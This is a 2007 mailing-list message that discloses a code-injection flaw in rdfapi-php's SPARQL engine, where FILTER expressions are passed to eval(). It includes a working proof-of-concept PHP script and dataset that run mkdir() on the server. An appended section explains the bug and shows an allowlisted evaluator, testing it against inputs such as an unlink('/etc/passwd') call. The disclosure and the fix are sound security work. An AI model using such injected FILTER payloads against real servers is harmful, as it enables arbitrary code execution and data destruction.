From: Christian W. <cw...@cw...> - 2007-01-25 22:13:31
Tobias,

> The regex function is evaluated in
> rdfapi-php\api\sparql\FilterFunctions.php. It works fine for me. Did you
> change something with the import mechanism so that this file is not
> imported with the sparql package?

Yes, I did change my imports a bit.

Now that I understand how you did this, I discovered that your eval'ing
code lets someone fully exploit a server that lets you input your own
SPARQL queries:

--------------
SELECT ?a WHERE {
  ?a ?b ?c .
  FILTER mkdir('/home/cweiske/exploit')
}
--------------

You can put anything instead of mkdir, incl. unlink, SQL database access
and everything.

Working demo exploit:

exploit.php:
---------------------
<?php
require_once(dirname(__FILE__) . '/../config.php');
require_once RDFAPI_INCLUDE_DIR . 'RdfAPI.php';
require_once RDFAPI_INCLUDE_DIR . 'sparql/SparqlParser.php';
require_once RDFAPI_INCLUDE_DIR . 'sparql/SparqlEngine.php';

// Load the one-triple dataset so the WHERE pattern matches at least once
// and the FILTER expression gets evaluated.
$parser   = new SparqlParser();
$graphset = ModelFactory::getDatasetMem('Dataset1');
$def      = $graphset->getDefaultGraph();
$def->load(dirname(__FILE__) . '/exploit.n3');

// The FILTER body is plain PHP as far as the engine is concerned.
$qs = "
SELECT ?a WHERE {
  ?a ?b ?c .
  FILTER mkdir('/home/cweiske/exploit')
}
";

$q      = $parser->parse($qs);
$engine = SparqlEngine::factory();
$t      = $engine->queryModel($graphset, $q, false);
?>
---------------------

exploit.n3:
---------------------
@prefix foaf: <http://xmlns.com/foaf/0.1/> .
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .

_:alice rdf:type foaf:Person ;
 .
---------------------

-- 
Regards/Mit freundlichen Grüßen
Christian Weiske
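The bug class behind the report, as an added example that is not rdfapi-php's own code and not part of the original message: a minimal FILTER evaluator that pastes query text into PHP source and eval()s it, next to one that parses the FILTER into a function name plus string/variable arguments and dispatches only to an allowlist. The $row binding, the evaluator and helper names, and the three allowlisted functions are assumptions for illustration; how FilterFunctions.php actually builds its eval() string is not shown on this page.

```php
<?php
// Added example (not rdfapi-php code). evalFilterUnsafe() turns FILTER text
// into PHP source and eval()s it; evalFilterSafe() parses the FILTER and
// dispatches only to an allowlist, so no query text ever becomes PHP.

// Constructed sample binding for one result row: variable name => value.
$row = [
    'a' => 'http://example.org/alice',
    'b' => 'http://xmlns.com/foaf/0.1/name',
    'c' => 'Alice',
];

// VULNERABLE: ?vars are replaced by quoted literals and the rest of the
// FILTER text goes to eval() unchanged. The query author can write any PHP
// expression (mkdir(...), unlink(...), a DB call) and it runs as the web server.
function evalFilterUnsafe(string $filter, array $row): bool
{
    $php = preg_replace_callback(
        '/\?([A-Za-z_]\w*)/',
        fn (array $m) => var_export($row[$m[1]] ?? null, true),
        $filter
    );
    return (bool) eval("return ($php);");
}

// HARDENED: accept only name(arg, ...) where each arg is ?var, "..." or '...'.
// Returns [name, args] with args as ['var', name] or ['str', value], else null.
function parseFilterCall(string $filter): ?array
{
    if (!preg_match('/^\s*([A-Za-z]+)\s*\((.*)\)\s*$/s', $filter, $m)) {
        return null;
    }
    $name = strtolower($m[1]);
    $src  = $m[2];
    if (trim($src) === '') {
        return [$name, []];
    }
    // /A anchors each match at $pos, so the whole argument list must consist
    // of valid tokens separated by commas; operators or nested calls fail.
    $tok  = '/\s*(?:\?([A-Za-z_]\w*)|"((?:[^"\\\\]|\\\\.)*)"|\'((?:[^\'\\\\]|\\\\.)*)\')\s*(,?)/A';
    $args = [];
    $pos  = 0;
    $len  = strlen($src);
    while ($pos < $len) {
        if (!preg_match($tok, $src, $t, 0, $pos)) {
            return null;
        }
        $pos += strlen($t[0]);
        $lead = ltrim($t[0])[0];
        if ($lead === '?') {
            $args[] = ['var', $t[1]];
        } else {
            $raw    = $lead === '"' ? $t[2] : $t[3];
            $args[] = ['str', preg_replace('/\\\\(.)/', '$1', $raw)];
        }
        if (($t[4] === ',') !== ($pos < $len)) {
            return null;   // comma must appear exactly between arguments
        }
    }
    return [$name, $args];
}

// Allowlist: SPARQL function name => PHP implementation (hypothetical set).
const FILTER_FUNCTIONS = [
    'regex' => 'filterRegex',
    'bound' => 'filterBound',
];

function filterRegex(array $a): bool
{
    if (count($a) < 2 || $a[0] === null || $a[1] === null) {
        return false;
    }
    // The pattern is data: escape the delimiter and keep only known flags.
    $flags = preg_replace('/[^imsx]/', '', $a[2] ?? '');
    $re    = '/' . str_replace('/', '\/', $a[1]) . '/' . $flags;
    return @preg_match($re, (string) $a[0]) === 1;
}

function filterBound(array $a): bool
{
    return count($a) === 1 && $a[0] !== null;
}

function evalFilterSafe(string $filter, array $row): bool
{
    $call = parseFilterCall($filter);
    if ($call === null || !isset(FILTER_FUNCTIONS[$call[0]])) {
        return false;   // unparseable or unknown function: reject the row
    }
    $args = array_map(
        fn (array $a) => $a[0] === 'var' ? ($row[$a[1]] ?? null) : $a[1],
        $call[1]
    );
    return call_user_func(FILTER_FUNCTIONS[$call[0]], $args);
}

// Benign input: the unsafe evaluator shows that FILTER text really is PHP.
var_dump(evalFilterUnsafe('strlen(?c) > 3', $row));       // bool(true)
var_dump(evalFilterSafe("regex(?c, '^Al')", $row));        // bool(true)

// The reported query. evalFilterUnsafe() would run mkdir() here, so it is
// not called; the allowlisted evaluator just rejects the row.
$hostile = "mkdir('/home/cweiske/exploit')";
var_dump(evalFilterSafe($hostile, $row));                 // bool(false)
var_dump(evalFilterSafe("regex(?c, 'A') || unlink('/etc/passwd')", $row)); // bool(false)
var_dump(is_dir('/home/cweiske/exploit'));                // bool(false)
```

The safe path never concatenates query text into PHP: an unknown function name or anything the argument grammar does not accept drops the row instead of reaching an interpreter. Regex patterns are still handed to preg_match() as data, so pathological patterns (ReDoS) remain a separate concern to handle with a timeout or backtracking limit.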